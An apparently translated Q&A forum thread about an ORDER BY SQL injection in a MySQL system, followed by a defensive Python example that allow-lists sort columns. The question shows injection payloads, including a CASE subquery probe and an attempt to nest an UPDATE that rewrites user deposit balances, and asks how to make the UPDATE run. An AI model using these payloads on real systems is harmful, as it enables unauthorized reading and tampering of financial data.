
mysql - What is the reason for this SQL error?

I found an ORDER BY-based SQL injection vulnerability in an old system that is under maintenance, and I am preparing to verify it.

I perform this SQL injection first, and it is OK:

SELECT sysitem_item.item_id FROM sysitem_item `sysitem_item` ORDER BY (select
case
when
(1=1)
then
1
else
(
select deposit
from sysuser_user_deposit
)end)=1 ASC LIMIT 20 OFFSET 0

But when I execute this SQL with an UPDATE statement, I get an error:

SELECT sysitem_item.item_id FROM sysitem_item `sysitem_item` ORDER BY (select
case
when
(1=1)
then
1
else
(
update
sysuser_user_deposit
set
deposit=11)end)=1 ASC LIMIT 20 OFFSET 0

Error message:

#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'update
sysuser_user_deposit
set
deposit=11)end)=1 ASC LIMIT 20 OFFSET 0' at line 9

How can I make it perform the update?

黄舟, 2825 days ago

  • 淡淡烟草味 2017-05-18 10:49:26

    When the main body is a SELECT, it cannot perform an update; otherwise it cannot be executed.
    I have tried this kind of injection in MyBatis. When executing an update in <select>, an error is reported directly and the injection cannot be done.

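The first query in the question still runs, so the ORDER BY clause of this system accepts arbitrary expressions even though the UPDATE is rejected by the parser. The following is an added example, not code from the original thread, of the usual fix for the maintained system: sort columns cannot be bound as parameters, so the clause is built only from an allow-list. It uses Python's `sqlite3` in place of MySQL so it runs offline; the `title` column, the function names and the sample rows are assumptions made for the example.

```python
import sqlite3

# Client-facing sort keys mapped to fixed SQL fragments. The `title` column is
# an assumption for this example; only item_id appears in the original query.
SORT_COLUMNS = {"id": "sysitem_item.item_id", "title": "sysitem_item.title"}
SORT_DIRECTIONS = {"asc": "ASC", "desc": "DESC"}


def build_item_query(sort_key, direction="asc"):
    """Build the listing query; ORDER BY comes only from the allow-lists."""
    try:
        column = SORT_COLUMNS[sort_key]
        order = SORT_DIRECTIONS[direction.lower()]
    except (KeyError, TypeError, AttributeError):
        # Anything that is not an exact known key is refused, never escaped.
        raise ValueError("unsupported sort parameter") from None
    return ("SELECT sysitem_item.item_id FROM sysitem_item "
            f"ORDER BY {column} {order} LIMIT ? OFFSET ?")


def list_items(conn, sort_key, direction="asc", limit=20, offset=0):
    """Run the query; LIMIT/OFFSET are bound as parameters, not concatenated."""
    sql = build_item_query(sort_key, direction)
    return [row[0] for row in conn.execute(sql, (int(limit), int(offset)))]


def make_demo_db():
    """Constructed sample data in an in-memory SQLite database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE sysitem_item (item_id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO sysitem_item VALUES (?, ?)",
                     [(1, "b"), (2, "c"), (3, "a")])
    return conn


if __name__ == "__main__":
    db = make_demo_db()
    print(list_items(db, "title"))         # sorted by title
    print(list_items(db, "id", "desc"))    # sorted by id, descending
    try:
        # Expression-shaped value, as in the question's ORDER BY clause.
        list_items(db, "(select case when (1=1) then 1 else 0 end)=1")
    except ValueError as exc:
        print("rejected:", exc)
```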